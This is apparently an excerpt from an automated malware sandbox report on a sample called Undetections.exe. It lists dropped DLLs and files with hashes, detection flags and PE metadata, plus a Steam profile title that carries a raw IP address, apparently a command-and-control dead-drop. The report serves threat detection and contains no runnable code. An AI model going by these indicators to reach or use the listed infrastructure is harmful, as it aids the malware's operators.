                                                                                                                                                                                                          SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                          SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):685392
                                                                                                                                                                                                          Entropy (8bit):6.872871740790978
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                          MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                          SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                          SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                          SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Joe Sandbox View:
• Filename: NhTbi9P7oO.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.PWSX-gen.22336.13850.exe, Detection: malicious
• Filename: 7POI2H21Hq.exe, Detection: malicious
• Filename: PJqcq2gz5W.exe, Detection: malicious
• Filename: UJzMs6lsyF.exe, Detection: malicious
• Filename: TxdFaToC4b.exe, Detection: malicious
• Filename: Q0G7dDD5jY.exe, Detection: malicious
• Filename: ENVroknEZb.exe, Detection: malicious
• Filename: fw5DeeIXHG.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):608080
                                                                                                                                                                                                          Entropy (8bit):6.833616094889818
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                          MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                          SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                          SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                          SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Joe Sandbox View:
• Filename: NhTbi9P7oO.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.PWSX-gen.22336.13850.exe, Detection: malicious
• Filename: 7POI2H21Hq.exe, Detection: malicious
• Filename: PJqcq2gz5W.exe, Detection: malicious
• Filename: UJzMs6lsyF.exe, Detection: malicious
• Filename: TxdFaToC4b.exe, Detection: malicious
• Filename: Q0G7dDD5jY.exe, Detection: malicious
• Filename: ENVroknEZb.exe, Detection: malicious
• Filename: fw5DeeIXHG.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):450024
                                                                                                                                                                                                          Entropy (8bit):6.673992339875127
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                          MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                          SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                          SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                          SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2046288
                                                                                                                                                                                                          Entropy (8bit):6.787733948558952
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                          MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                          SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                          SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                          SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):257872
                                                                                                                                                                                                          Entropy (8bit):6.727482641240852
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                          MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                          SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                          SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                          SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):80880
                                                                                                                                                                                                          Entropy (8bit):6.920480786566406
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                          MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                          SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                          SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                          SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Undetections\spoofer.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):42
                                                                                                                                                                                                          Entropy (8bit):4.0050635535766075
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                                                                                                                                                          MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                                                                                                                                                          SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                                                                                                                                                          SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                                                                                                                                                          SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3041), with CRLF, LF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):34667
                                                                                                                                                                                                          Entropy (8bit):5.431086328560938
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:57pqLtWY7wt5D0gqrgiNGA3Z4VWBCW3KI8iCfukPco1AU2Z4VWBCW3KI8iKh2Sw5:578LtWY7wt5D0gqrgc3Z4VWBCW3KI8ib
                                                                                                                                                                                                          MD5:0999C8EBA8870DAB83F16F7184652365
                                                                                                                                                                                                          SHA1:BDBFF8915B4FFDC0AD3C7A6BFF39C4C39DB831AC
                                                                                                                                                                                                          SHA-256:680562EDFF9D8195E4CC430B96CC842E4ACB8DDA9E711106FB08AF0E0F6A8AE3
                                                                                                                                                                                                          SHA-512:4F3379F1F9AADA0E838BED5D62FB27D4D0BCCEC10D2F4220D7A90F3A88FD0A254B57E89CA1B6E7325B605006E544BBFAFE826A5C8A53212B8CB7DEA3E0FE6373
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: i1il https://95.217.212.139|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=2VoZa2M8Wh3k&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.c
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2459136
                                                                                                                                                                                                          Entropy (8bit):6.052474106868353
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                                                                                                                                                                          MD5:90E744829865D57082A7F452EDC90DE5
                                                                                                                                                                                                          SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                                                                                                                                                                          SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                                                                                                                                                                          SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):685392
                                                                                                                                                                                                          Entropy (8bit):6.872871740790978
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                          MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                          SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                          SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                          SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):608080
                                                                                                                                                                                                          Entropy (8bit):6.833616094889818
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                          MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                          SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                          SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                          SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):450024
                                                                                                                                                                                                          Entropy (8bit):6.673992339875127
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                          MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                          SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                          SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                          SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2046288
                                                                                                                                                                                                          Entropy (8bit):6.787733948558952
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                          MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                          SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                          SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                          SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):257872
                                                                                                                                                                                                          Entropy (8bit):6.727482641240852
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                          MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                          SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                          SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                          SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):80880
                                                                                                                                                                                                          Entropy (8bit):6.920480786566406
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                          MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                          SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                          SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                          SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                          Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                          Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Undetections.exe
                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                          Size (bytes):219136
                                                                                                                                                                                                          Entropy (8bit):7.9785084518397795
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3072:8T79OcGMxZeY2fl8U0K++4gfhqF8WtxopwHkqIsSLFoTQp7imdJZAY+it6DcOS:zM5Uwga89wHbGOKp+u6DcO
                                                                                                                                                                                                          MD5:96EF850D149542B53F033375B1C50CC9
                                                                                                                                                                                                          SHA1:D1524ED874C286EF4169C588EA2F1F2B8C9993D9
                                                                                                                                                                                                          SHA-256:ABB5BA187C21034264CAE6AE84962B22C58CBB81442B059B9A0AFC3234182C7E
                                                                                                                                                                                                          SHA-512:CA79888198B1AA435CE2D6920068DD409804572D6058DBC68D8AB94983BF92749BA14A8ADB5A3AEA7CD3883A45EAA9298CF37DC6267AEA76473B1B119ED9F2AE
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 61%
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Undetections.exe
                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):215501
                                                                                                                                                                                                          Entropy (8bit):7.999152215046782
                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                          SSDEEP:3072:jEZiGytshOGMxZeYsfl8U0K++4gNhqF8WtxopwHkGIsSLFoTQpXimdJZAYPcQMIN:jEM1tGMXUwgM89wH5GSKpUQMu
                                                                                                                                                                                                          MD5:BDB906144FFDA9BA673FE3C368B7CA98
                                                                                                                                                                                                          SHA1:A2E4138852F896DB3D236D4FE7697B6047831D7D
                                                                                                                                                                                                          SHA-256:ECC493D02008E44809C035B42944FD41D67D55E4273E60C5585FABF60318885B
                                                                                                                                                                                                          SHA-512:5E6FB292937340D6758426F5BCABDB34D53DA29269324E1FE9CDCFCF1E13A834C213958677C33B576D3C69E62ED7F350380E284D08751744990DD11922F1AC0A
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                          Entropy (8bit):6.242001108764822
                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                          File name:Undetections.exe
                                                                                                                                                                                                          File size:1'800'192 bytes
                                                                                                                                                                                                          MD5:3af8847a68f187e5425af04cfe48d1cf
                                                                                                                                                                                                          SHA1:51005458a440023c8537db8a72f19094b91837b4
                                                                                                                                                                                                          SHA256:d241425f895f1f32b3f619c33d9b95820a25feb7ded489d449f36ac3c96b9865
                                                                                                                                                                                                          SHA512:50917f9580eb47f0b01cc90d57d40dca9eacdf01e5a80089148aa11fdbca2585e4c5cbf046f95c806f0771d4c47b7cfe7e477141d5352a4f9e4bc47ec2002f5e
                                                                                                                                                                                                          SSDEEP:12288:5V6HFV6H/YUeD1zgrmoxdGxa1PI+QDXMZ6GQ6ov2m+UtbVkGDvAd1sYV:5UHFUH/+1UrmyWalINbQUv2gVbAdR
                                                                                                                                                                                                          TLSH:4385DF95DA168EA6C98506F18862CF31B3200F28454DE70B67F5BDEB3EB53C96006FD6
                                                                                                                                                                                                          Icon Hash:0f3171f07068710f
                                                                                                                                                                                                          Entrypoint:0x57972e
                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                          Time Stamp:0xEBAED08E [Wed Apr 20 01:46:54 2095 UTC]
                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                          File Version Major:4
                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                          jmp dword ptr [00402000h]
                                                                                                                                                                                                          add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x1796d8         0x53          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x17a000         0x3fa42       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x1ba000         0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity       File Type  Entropy              Characteristics
